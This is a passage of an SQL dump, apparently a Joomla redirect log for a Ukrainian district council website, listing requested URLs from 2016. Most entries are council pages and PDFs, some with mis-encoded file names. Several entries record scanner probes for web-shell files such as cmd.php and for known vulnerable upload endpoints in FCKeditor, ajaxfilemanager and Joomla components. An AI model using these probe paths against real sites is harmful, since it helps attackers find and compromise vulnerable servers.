00:00:00',301),(28584,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1490-pro-vnesennya-zmin-ta-zatverdzhennya-u-novij-redaktsiji-statutiv-komunalnikh-zakladiv-kulturi',NULL,'','',33,0,'2016-07-15 07:58:40','0000-00-00 00:00:00',301),(28585,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1490-pro-vnesennya-zmin-ta-zatverdzhennya-u-novij-redaktsiji-statutiv-komunalnikh-zakladiv-kulturi',NULL,'','',31,0,'2016-07-15 11:17:11','0000-00-00 00:00:00',301),(28586,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1492-pro-vnesennya-zmin-do-shtatnikh-rozpisiv-komunalnikh-zakladiv-kulturi',NULL,'','',28,0,'2016-07-16 14:14:40','0000-00-00 00:00:00',301),(28587,'http://www.malyn-rayrada.gov.ua/attachments/article/1481/Ð¾Ð±Ñ”Ð´Ð½Ð°Ð½Ð½Ñ .pdf',NULL,'','',1,0,'2016-07-17 04:25:15','0000-00-00 00:00:00',301),(28588,'http://www.malyn-rayrada.gov.ua/bitrix/admin/index.php?lang=en',NULL,'','',12,0,'2016-07-19 17:49:46','0000-00-00 00:00:00',301),(28589,'http://www.malyn-rayrada.gov.ua/sinoptik.ua/informers_js.php?title=3&wind=1&cities=303015024&lang=ua',NULL,'','',3,0,'2016-07-21 13:07:30','0000-00-00 00:00:00',301),(28590,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1501-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2016-rik',NULL,'','',46,0,'2016-07-22 11:06:15','0000-00-00 00:00:00',301),(28591,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1461-pro-zatverdzhennya-poryadku-priznachennya-na-posadu-kerivnikiv-zagalnoosvitnikh-zakladiv-komunalnoji-formi-vlasnosti-malinskogo-rajonu-zhitomirskoji-oblasti?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-07-22 21:10:49','0000-00-00 00:00:00',301),(28592,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1501-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2016-rik',NULL,'','',10,0,'2016-07-22 23:28:46','0000-00-00 00:00:00',301),(28593,'http://malyn-rayrada.gov.ua/attachments/article/1482/протокол 2.pdf',NULL,'','',2,0,'2016-07-23 17:40:53','0000-00-00 00:00:00',301),(28594,'http://malyn-rayrada.gov.ua/attachments/article/1482/протокол 1.pdf',NULL,'','',2,0,'2016-07-23 19:35:02','0000-00-00 00:00:00',301),(28595,'http://www.malyn-rayrada.gov.ua/license.php',NULL,'http://www.malyn-rayrada.gov.ua/license.php','',24,0,'2016-07-24 10:26:16','0000-00-00 00:00:00',301),(28596,'http://malyn-rayrada.gov.ua/images/stories/food.php?rf',NULL,'','',2,0,'2016-07-25 07:10:20','0000-00-00 00:00:00',301),(28597,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1461-pro-zatverdzhennya-poryadku-priznachennya-na-posadu-kerivnikiv-zagalnoosvitnikh-zakladiv-komunalnoji-formi-vlasnosti-malinskogo-rajonu-zhitomirskoji-oblasti',NULL,'https://www.google.com.ua/','',57,0,'2016-07-25 18:46:55','0000-00-00 00:00:00',301),(28598,'http://www.malyn-rayrada.gov.ua/images/stories/food.php?rf',NULL,'','',2,0,'2016-07-26 08:04:47','0000-00-00 00:00:00',301),(28599,'http://www.malyn-rayrada.gov.ua/modules/up.php?up=hous',NULL,'http://www.malyn-rayrada.gov.ua/modules/up.php?up=hous','',1,0,'2016-07-27 03:40:52','0000-00-00 00:00:00',301),(28600,'http://www.malyn-rayrada.gov.ua/attachments/article/1436/Декларації Ñ Ñ–Ð»ÑŒÑ ÑŒÐºÑ– ради1.pdf',NULL,'','',1,0,'2016-07-27 19:24:38','0000-00-00 00:00:00',301),(28601,'http://www.malyn-rayrada.gov.ua/attachments/article/1506/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  8 Ñ ÐµÑ Ñ–Ñ .pdf',NULL,'','',1,0,'2016-07-28 04:20:47','0000-00-00 00:00:00',301),(28602,'http://www.malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php','',1,0,'2016-07-29 04:29:58','0000-00-00 00:00:00',301),(28603,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1461-pro-zatverdzhennya-poryadku-priznachennya-na-posadu-kerivnikiv-zagalnoosvitnikh-zakladiv-komunalnoji-formi-vlasnosti-malinskogo-rajonu-zhitomirskoji-oblasti',NULL,'','',31,0,'2016-07-30 06:03:08','0000-00-00 00:00:00',301),(28604,'http://www.malyn-rayrada.gov.ua/modules/productpageadverts/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/productpageadverts/uploadimage.php','',1,0,'2016-08-01 15:08:20','0000-00-00 00:00:00',301),(28605,'http://www.malyn-rayrada.gov.ua/index.php/1514-ogoloshuetsya-konkurs-na-viznachennya-peremozhtsiv',NULL,'','',31,0,'2016-08-03 16:44:07','0000-00-00 00:00:00',301),(28606,'http://malyn-rayrada.gov.ua/index.php/1514-ogoloshuetsya-konkurs-na-viznachennya-peremozhtsiv',NULL,'','',40,0,'2016-08-04 19:21:53','0000-00-00 00:00:00',301),(28607,'http://www.malyn-rayrada.gov.ua/attachments/article/2/Ð”ÐµÐºÐ»Ð°Ñ€Ð°Ñ†Ñ–Ñ  Ричипоренко за 2015 рік.pdf',NULL,'','',2,0,'2016-08-14 07:14:12','0000-00-00 00:00:00',301),(28608,'http://www.malyn-rayrada.gov.ua/attachments/article/2/Ð”ÐµÐºÐ»Ð°Ñ€Ð°Ñ†Ñ–Ñ  Левковець.pdf',NULL,'','',2,0,'2016-08-14 10:12:37','0000-00-00 00:00:00',301),(28609,'http://malyn-rayrada.gov.ua/index.php/ 46',NULL,'','',1,0,'2016-08-15 00:01:14','0000-00-00 00:00:00',301),(28610,'http://malyn-rayrada.gov.ua/index.php/ 32',NULL,'','',1,0,'2016-08-15 00:01:20','0000-00-00 00:00:00',301),(28611,'http://malyn-rayrada.gov.ua/index.php/ 28',NULL,'','',1,0,'2016-08-15 00:01:23','0000-00-00 00:00:00',301),(28612,'http://malyn-rayrada.gov.ua/shootme.php',NULL,'http://www.googlebot.com/bot.html','',9,0,'2016-08-15 08:28:26','0000-00-00 00:00:00',301),(28613,'http://www.malyn-rayrada.gov.ua/attachments/article/1431/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ .pdf',NULL,'','',2,0,'2016-08-18 16:52:23','0000-00-00 00:00:00',301),(28614,'http://www.malyn-rayrada.gov.ua/attachments/article/1482/протокол 1.pdf',NULL,'','',5,0,'2016-08-21 05:08:42','0000-00-00 00:00:00',301),(28615,'http://www.malyn-rayrada.gov.ua/attachments/article/1482/протокол 2.pdf',NULL,'','',2,0,'2016-08-21 06:51:42','0000-00-00 00:00:00',301),(28616,'http://malyn-rayrada.gov.ua/user',NULL,'','',3,0,'2016-08-22 14:49:10','0000-00-00 00:00:00',301),(28617,'http://malyn-rayrada.gov.ua/images/stories/cmd.php',NULL,'','',2,0,'2016-08-23 16:18:16','0000-00-00 00:00:00',301),(28618,'http://malyn-rayrada.gov.ua/blog/',NULL,'','',18,0,'2016-08-25 04:50:35','0000-00-00 00:00:00',301),(28619,'http://malyn-rayrada.gov.ua/wordpress/',NULL,'','',15,0,'2016-08-25 04:50:35','0000-00-00 00:00:00',301),(28620,'http://malyn-rayrada.gov.ua/wp/',NULL,'','',15,0,'2016-08-25 04:50:35','0000-00-00 00:00:00',301),(28621,'http://www.malyn-rayrada.gov.ua/mobile/index.php/deputatska-storinka/2010-06-05-12-50-56',NULL,'','',3,0,'2016-08-25 17:47:17','0000-00-00 00:00:00',301),(28622,'http://www.malyn-rayrada.gov.ua/user/',NULL,'','',11,0,'2016-08-26 01:01:39','0000-00-00 00:00:00',301),(28623,'http://malyn-rayrada.gov.ua/index.php?option=com_myblog&task=ajaxupload',NULL,'','',8,0,'2016-09-02 19:51:02','0000-00-00 00:00:00',301),(28624,'http://malyn-rayrada.gov.ua/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',5,0,'2016-09-02 19:51:02','0000-00-00 00:00:00',301),(28625,'http://www.malyn-rayrada.gov.ua/attachments/article/2/Декларація Левковець.pdf',NULL,'','',3,0,'2016-09-10 20:04:23','0000-00-00 00:00:00',301),(28626,'http://www.malyn-rayrada.gov.ua/wp-admin/user/wp-reader.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-admin/user/wp-reader.php','',1,0,'2016-09-11 16:12:33','0000-00-00 00:00:00',301),(28627,'http://www.malyn-rayrada.gov.ua/attachments/article/1531/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  9 Ñ ÐµÑ Ñ–Ñ .pdf',NULL,'','',2,0,'2016-09-13 19:21:27','0000-00-00 00:00:00',301),(28628,'http://malyn-rayrada.gov.ua/en/',NULL,'','',1,0,'2016-09-21 20:55:04','0000-00-00 00:00:00',301),(28629,'http://malyn-rayrada.gov.ua/index.php/en/',NULL,'','',1,0,'2016-09-21 20:55:04','0000-00-00 00:00:00',301),(28630,'http://malyn-rayrada.gov.ua/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc',NULL,'','',1,0,'2016-09-21 20:55:05','0000-00-00 00:00:00',301),(28631,'http://malyn-rayrada.gov.ua/index.php?option=com_jdownloads&Itemid=0&view=upload',NULL,'','',4,0,'2016-09-21 20:55:05','0000-00-00 00:00:00',301),(28632,'http://malyn-rayrada.gov.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',7,0,'2016-09-21 20:55:06','0000-00-00 00:00:00',301),(28633,'http://malyn-rayrada.gov.ua/post.php',NULL,'','',2,0,'2016-09-21 20:55:07','0000-00-00 00:00:00',301),(28634,'http://malyn-rayrada.gov.ua/modules/mod_ppc_simple_spotlight/elements/',NULL,'','',1,0,'2016-09-21 20:55:07','0000-00-00 00:00:00',301),(28635,'http://malyn-rayrada.gov.ua/config/',NULL,'','',1,0,'2016-09-21 20:55:07','0000-00-00 00:00:00',301),(28636,'http://malyn-rayrada.gov.ua/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'','',1,0,'2016-09-21 20:55:08','0000-00-00 00:00:00',301),(28637,'http://malyn-rayrada.gov.ua/admin/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'','',1,0,'2016-09-21 20:55:08','0000-00-00 00:00:00',301),(28638,'http://malyn-rayrada.gov.ua/upload/feeds_logos/',NULL,'','',1,0,'2016-09-21 20:55:09','0000-00-00 00:00:00',301),(28639,'http://malyn-rayrada.gov.ua/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',2,0,'2016-09-21 20:55:09','0000-00-00 00:00:00',301),(28640,'http://malyn-rayrada.gov.ua/admin/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',3,0,'2016-09-21 20:55:09','0000-00-00 00:00:00',301),(28641,'http://malyn-rayrada.gov.ua/javascript/editors/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:10','0000-00-00 00:00:00',301),(28642,'http://malyn-rayrada.gov.ua/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:10','0000-00-00 00:00:00',301),(28643,'http://malyn-rayrada.gov.ua/admin/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:11','0000-00-00 00:00:00',301),(28644,'http://malyn-rayrada.gov.ua/editor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:11','0000-00-00 00:00:00',301),(28645,'http://malyn-rayrada.gov.ua/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:11','0000-00-00 00:00:00',301),(28646,'http://malyn-rayrada.gov.ua/cms/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:12','0000-00-00 00:00:00',301),(28647,'http://malyn-rayrada.gov.ua/js/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2016-09-21 20:55:12','0000-00-00 00:00:00',301),(28648,'http://www.malyn-rayrada.gov.ua//meigao.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2016-09-23 20:10:24','0000-00-00 00:00:00',301),(28649,'http://malyn-rayrada.gov.ua//meigao.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2016-09-24 01:49:34','0000-00-00 00:00:00',301),(28650,'http://malyn-rayrada.gov.ua/a',NULL,'','',1,0,'2016-09-25 00:54:25','0000-00-00 00:00:00',301),(28651,'http://malyn-rayrada.gov.ua/attachments/article/1481/обєднання.pdf',NULL,'','',3,0,'2016-09-27 03:00:09','0000-00-00 00:00:00',301),(28652,'http://malyn-rayrada.gov.ua/nau://ukr/z0633-16/',NULL,'','',1,0,'2016-10-07 03:04:06','0000-00-00 00:00:00',301),(28653,'http://malyn-rayrada.gov.ua/index.php/1217-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi',NULL,'','',24,0,'2016-10-14 07:01:14','0000-00-00 00:00:00',301),(28654,'http://www.malyn-rayrada.gov.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pridbannya-kotliv',NULL,'','',30,0,'2016-10-14 07:36:51','0000-00-00 00:00:00',301),(28655,'http://malyn-rayrada.gov.ua/index.php/994-do-uvagi-platnikiv-fiksovanogo-silskogospodarskogo-podatku?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-14 08:30:28','0000-00-00 00:00:00',301),(28656,'http://www.malyn-rayrada.gov.ua/index.php/414-fotoreportazh-iz-svjatkuvannja-dnja-miscevogo?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-14 10:41:45','0000-00-00 00:00:00',301),(28657,'http://www.malyn-rayrada.gov.ua/index.php/1123-20-chervnya-na-malinshchini-pokhovali-geroya-ato-vasilya-baranivskogo?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-14 12:18:47','0000-00-00 00:00:00',301),(28658,'http://www.malyn-rayrada.gov.ua/index.php/1334-pro-sklikannya-4-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',31,0,'2016-10-14 13:13:12','0000-00-00 00:00:00',301),(28659,'http://www.malyn-rayrada.gov.ua/index.php/1440-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'','',40,0,'2016-10-14 13:52:03','0000-00-00 00:00:00',301),(28660,'http://www.malyn-rayrada.gov.ua/index.php/653-svjato-jakogo-chekali-dva-roki-prijshlo-do-ditok',NULL,'','',25,0,'2016-10-14 14:38:25','0000-00-00 00:00:00',301),(28661,'http://www.malyn-rayrada.gov.ua/index.php/1375-pro-sklikannya-5-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-14 14:40:32','0000-00-00 00:00:00',301),(28662,'http://malyn-rayrada.gov.ua/index.php/1353-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue',NULL,'','',27,0,'2016-10-14 15:47:05','0000-00-00 00:00:00',301),(28663,'http://www.malyn-rayrada.gov.ua/index.php/881-pozachergovi-vibori-narodnikh-deputativ-ukrajini-26-zhovtnya-2014-roku-informatsiya-tsvk-stanom-na-20-godinu-28-09-2014-roku',NULL,'','',32,0,'2016-10-14 17:56:01','0000-00-00 00:00:00',301),(28664,'http://malyn-rayrada.gov.ua/index.php/76-povitrjano-transportna-prigoda-bilja-dibrovi',NULL,'','',24,0,'2016-10-14 18:23:53','0000-00-00 00:00:00',301),(28665,'http://www.malyn-rayrada.gov.ua/index.php/988-minsotspolitiki-mistsevi-organi-vladi-sami-virishuvatimut-yak-krashche-organizuvati-kharchuvannya-ditej-chornobiltsiv',NULL,'','',26,0,'2016-10-14 19:11:11','0000-00-00 00:00:00',301),(28666,'http://malyn-rayrada.gov.ua/index.php/1016-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-povidomlyae-platnikiv?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-14 21:15:47','0000-00-00 00:00:00',301),(28667,'http://malyn-rayrada.gov.ua/index.php/891-zakon-ukrajini-pro-ochishchennya-vladi',NULL,'','',32,0,'2016-10-14 22:43:13','0000-00-00 00:00:00',301),(28668,'http://www.malyn-rayrada.gov.ua/index.php/1006-roglyanuto-pitannya-vikoristannya-mislivskikh-ugid',NULL,'','',24,0,'2016-10-14 23:07:13','0000-00-00 00:00:00',301),(28669,'http://malyn-rayrada.gov.ua/index.php/895-pro-rozshirennya-povnovazhen-mistsevikh-rad-shchodo-upravlinnya-teritoriyami',NULL,'','',52,0,'2016-10-14 23:19:25','0000-00-00 00:00:00',301),(28670,'http://www.malyn-rayrada.gov.ua/index.php/895-pro-rozshirennya-povnovazhen-mistsevikh-rad-shchodo-upravlinnya-teritoriyami?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-15 00:36:06','0000-00-00 00:00:00',301),(28671,'http://malyn-rayrada.gov.ua/index.php/1065-vidpovid-departamentu-minsotspolitiki-z-pitan-chornobilskikh-pilg',NULL,'','',20,0,'2016-10-15 01:46:30','0000-00-00 00:00:00',301),(28672,'http://www.malyn-rayrada.gov.ua/index.php/1009-do-vidoma-deputativ-malinskoji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-15 06:36:12','0000-00-00 00:00:00',301),(28673,'http://malyn-rayrada.gov.ua/index.php/653-svjato-jakogo-chekali-dva-roki-prijshlo-do-ditok',NULL,'','',29,0,'2016-10-15 07:25:13','0000-00-00 00:00:00',301),(28674,'http://malyn-rayrada.gov.ua/index.php/1412-kp-arkhplan-informue',NULL,'','',52,0,'2016-10-15 09:09:35','0000-00-00 00:00:00',301),(28675,'http://malyn-rayrada.gov.ua/index.php/1116-do-uvagi-malinchan',NULL,'','',22,0,'2016-10-15 09:10:10','0000-00-00 00:00:00',301),(28676,'http://www.malyn-rayrada.gov.ua/index.php/1076-vr-vvela-na-10-rokiv-moratorij-na-eksport-neobroblenikh-liso-ta-pilomaterialiv?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-15 09:55:07','0000-00-00 00:00:00',301),(28677,'http://malyn-rayrada.gov.ua/index.php/1440-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1210.FCFRolEd-OIXqwrpcwV8UzYhstNuxlOSComlOyWVzw6mFYXux39iXuvN9ZvrcDo7.95dd5494be1a47d66a47a5b4da9c9eb289bb8530&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxdWRkNVdXVk15eF9WOUVrN3lwUFlIWmNWeFpwZGV1THd6VEc3anhhT19YNHhkZncyNXc4S3FMRmItdVFtb2ZHM29jdzBKV2VqcllJcXJSdjNoc0J3bU0wckJYWkxGYXA1T2RJSUxTMGFXUHFBNlN6SUxNZF9QWm1SNU1IS1haSGNobGp4akk4a1VNZVZIRnR2NDI3bzFlRk9ZQkdqUjRUNEtIaTBFWHBPdk1wNlFsQkJ3OHFRVHVfYXdoN2FqR1V3Z0VrVXBveDV0VE4wVDA3a3VtQjZEX3UzVXVydFZXeDFobTFVT3Q3dnR4YTBCLUFUV0VkZFVBU1RtLUxSX1VxTGpoZEVMaWRTa2NjSDlDeUJkZHRIcnlXRmZZRURPeTI1RXpSY3JtX2RKam4&b64e=2&sign=845770cd25181131fcd48d74a6bc6260&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93Xfrtkbapu9tx_S-yak32P6qmJfKnY6E3uz9i8jZo9tJpPsR7Voypb5-oq17uAXqK9ubgHGxHNL3R8i86J2RdaEMtuM5JC6EFrCjd-CCqeNtdJIbF5E-YWBDHDK2SfVUelNxg4Gf&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEaaNiN6ScULlspOunTuovST0Nhe3Mp-QX8JiigT8X0HJOFuhkDma2SxcPZ7PiFDUNCJBBm13vJau&l10n=ru&cts=1476540459417&mc=4.42780913451','',133,0,'2016-10-15 14:25:54','0000-00-00 00:00:00',301),(28678,'http://www.malyn-rayrada.gov.ua/index.php/1412-kp-arkhplan-informue',NULL,'','',31,0,'2016-10-15 16:10:00','0000-00-00 00:00:00',301),(28679,'http://www.malyn-rayrada.gov.ua/index.php/76-povitrjano-transportna-prigoda-bilja-dibrovi',NULL,'','',30,0,'2016-10-15 17:31:00','0000-00-00 00:00:00',301),(28680,'http://www.malyn-rayrada.gov.ua/index.php/1435-vitaemo-iz-velikodnem?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-15 17:36:04','0000-00-00 00:00:00',301),(28681,'http://malyn-rayrada.gov.ua/index.php/1135-derzhavna-veterinarna-sluzhba-rajonu-informue?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-15 17:41:52','0000-00-00 00:00:00',301),(28682,'http://www.malyn-rayrada.gov.ua/index.php/1353-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-15 21:31:12','0000-00-00 00:00:00',301),(28683,'http://www.malyn-rayrada.gov.ua/index.php/993-grafik-prijomu-gromadyan-derzhavnimi-kadastrovimi-reestratorami',NULL,'','',24,0,'2016-10-15 22:27:37','0000-00-00 00:00:00',301),(28684,'http://www.malyn-rayrada.gov.ua/index.php/761-pid-chas-vikonannja-robit-po-blagoustroju-centru',NULL,'','',23,0,'2016-10-16 02:08:51','0000-00-00 00:00:00',301),(28685,'http://www.malyn-rayrada.gov.ua/index.php/1016-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-povidomlyae-platnikiv',NULL,'','',24,0,'2016-10-16 02:11:13','0000-00-00 00:00:00',301),(28686,'http://malyn-rayrada.gov.ua/index.php/1076-vr-vvela-na-10-rokiv-moratorij-na-eksport-neobroblenikh-liso-ta-pilomaterialiv',NULL,'','',27,0,'2016-10-16 02:19:16','0000-00-00 00:00:00',301),(28687,'http://www.malyn-rayrada.gov.ua/index.php/1437-pro-priznachennya-yu-rudchenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti',NULL,'','',32,0,'2016-10-16 02:26:27','0000-00-00 00:00:00',301),(28688,'http://www.malyn-rayrada.gov.ua/index.php/435-nareshti-vigljanulo-sonce',NULL,'','',30,0,'2016-10-16 02:26:56','0000-00-00 00:00:00',301),(28689,'http://www.malyn-rayrada.gov.ua/index.php/1025-rozenko-reformuvannya-sistemi-nadannya-subsidij-odna-z-klyuchovikh-reform-u-sotsialnij-sferi',NULL,'','',26,0,'2016-10-16 04:27:40','0000-00-00 00:00:00',301),(28690,'http://malyn-rayrada.gov.ua/index.php/1091-informatsiya-shchodo-pensijnoji-reformi',NULL,'','',21,0,'2016-10-16 05:52:01','0000-00-00 00:00:00',301),(28691,'http://www.malyn-rayrada.gov.ua/index.php/1101-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s-shchodo-viplat-pensij-za-traven',NULL,'','',32,0,'2016-10-16 12:01:11','0000-00-00 00:00:00',301),(28692,'http://www.malyn-rayrada.gov.ua/index.php/994-do-uvagi-platnikiv-fiksovanogo-silskogospodarskogo-podatku',NULL,'','',25,0,'2016-10-16 14:08:56','0000-00-00 00:00:00',301),(28693,'http://malyn-rayrada.gov.ua/index.php/1177-vitaemo-iz-svyatom-pershogo-dzvonika',NULL,'','',25,0,'2016-10-16 14:13:40','0000-00-00 00:00:00',301),(28694,'http://www.malyn-rayrada.gov.ua/index.php/810-centrviborchkom-obrobiv-100-protokoliv-za',NULL,'','',26,0,'2016-10-16 16:43:38','0000-00-00 00:00:00',301),(28695,'http://malyn-rayrada.gov.ua/index.php/979-nastav-rizdvyanij-svyatvechir',NULL,'','',22,0,'2016-10-16 17:35:38','0000-00-00 00:00:00',301),(28696,'http://malyn-rayrada.gov.ua/index.php/810-centrviborchkom-obrobiv-100-protokoliv-za',NULL,'','',37,0,'2016-10-16 18:56:31','0000-00-00 00:00:00',301),(28697,'http://malyn-rayrada.gov.ua/index.php/1260-vitaemo-iz-svyatom',NULL,'','',23,0,'2016-10-16 20:36:46','0000-00-00 00:00:00',301),(28698,'http://www.malyn-rayrada.gov.ua/index.php/986-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue',NULL,'','',33,0,'2016-10-16 23:32:21','0000-00-00 00:00:00',301),(28699,'http://malyn-rayrada.gov.ua/index.php/1434-visti-iz-chempionatu-ukrajini-z-boksu-sered-yunakiv',NULL,'','',40,0,'2016-10-17 00:13:39','0000-00-00 00:00:00',301),(28700,'http://malyn-rayrada.gov.ua/index.php/569-den-sela-u-vladivci-fotoreportazh',NULL,'','',28,0,'2016-10-17 02:38:33','0000-00-00 00:00:00',301),(28701,'http://www.malyn-rayrada.gov.ua/index.php/1055-roz-yasnennya-shchodo-otrimannya-subsidij',NULL,'','',31,0,'2016-10-17 06:29:57','0000-00-00 00:00:00',301),(28702,'http://www.malyn-rayrada.gov.ua/index.php/414-fotoreportazh-iz-svjatkuvannja-dnja-miscevogo',NULL,'','',23,0,'2016-10-17 08:07:47','0000-00-00 00:00:00',301),(28703,'http://www.malyn-rayrada.gov.ua/index.php/1134-onovleno-elektroosvitlennya-stseni-malinskogo-rbk',NULL,'','',22,0,'2016-10-17 08:35:25','0000-00-00 00:00:00',301),(28704,'http://malyn-rayrada.gov.ua/index.php/1055-roz-yasnennya-shchodo-otrimannya-subsidij',NULL,'http://yandex.ua/clck/jsredir?from=yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=1212.qMrz2_BXJEwBu6NguoAVFD4gpBfHjEIvgznHPJfv_CNptw0pRgzNOWqpHGHi7TnVfg05PH_PM0y8hdcZSPG15aRRd-vkJs_XiLb68GsoZnwsTvsJ2G59tHM1w45pxuGQAudPJmqEl6g5ZuaKpuLoIJJhCXrv9XSJEiADPDeOIcIXcjTVknrQ3EvwZgstSrDq.e1c4bd04894e3fbcc1118b8821b5624255104034&uuid=&state=PEtFfuTeVD5kpHnK9lio9dp88zwjJi-A9wwjDIux7f8Zuv0g6oZ30w&data=UlNrNmk5WktYejR0eWJFYk1LdmtxdWRkNVdXVk15eF9WOUVrN3lwUFlIWmNWeFpwZGV1THd6VEc3anhhT19YNHVxZUNwaWFxa3YyTmxJT3Y3Wm9SNWdUOURfVTA2Uy1BcW8tSHhRNXBQaTItNlA2dDNCWnZfaG5rVmdYMHphT2hoMDRscTNwdkQwcUw1YmR2blUzZmJOQV9jbkZNT3l5VVUyZ1dXS3lnVWMwblZ0RFRPVGFCYkE&b64e=2&sign=0ec57704b961a7e9d91ce723406e88c6&keyno=0&cst=AiuY0DBWFJ5Hyx_fyvalFPYiL2acjagI3CWqdb7fo6UdTUmz31s8Pd52VhbSyZnLxpVJ3hb9shJeEPJHJzrpfWlevfyTvQodzfCZGpn6bW5jwlb-xtvWBZ77YD9l7bWG6sWcx-ecM9XCQPOD05RUbrvX42-qrJj7ioPbZWRcZG5_23AoZ-VY2Czp5CzUNlqmhcb-pMnqbT8G3Z_GsZGNDjjTyZPpamR2M1dhdlyzlEbnLcEBt1DddBufwSakKTMcLuzBDMtXz4Bk6b31iZvql30FC0ugk1TvYVXpszmgucAvkODdtQOPjN-vF1kwCdLfzG1Fo9VJ_cdI2-WrBjCOpkrB8ydxZSkOhMRJcGRBcWS_LS6u3YYVNp02JfEsdbeF&ref=orjY4mGPRjmt1xzYuZsDZSKx6sHOF1RVO2wbfNnzrKoLMChmp7xC9mQu0O44BPXt6Amgm4kLgNZPo9ewLNemQPkMcd700wzndwKXeGHaquG-hP3q9ThXN1oYEl-Djh9FBqaDjKU9XAqJl0Jk9bFGxjJjfcdbxIM0b-TRxjELVedC4pNfyNo4UDLaDMBIMDdM2e80h-JJWGBq_TF4HnI-HyMZ8uCXow1czUuothcV-pXMy4gD5_md_jgrCwj8QzeYYoRMebEKWEn5JnCpFY6pXYYncQAAhLY1HD6poUZJ2eVWSStIZu24GjNdKgjpsI5g0Jm3QjTsI1U982RzuhkKtt5EwLQyAACzs84MZbyygjQaADuNXIpx_QDoiOyVHK2jrr_JxGyGQDBPVewoxJQUG1b8YFzuSCaBT67LELUGkEU2iZxiePr1Lb5tjA1GhohpSSykLTzI-w2LOU-7xKhSW5mIwwrL54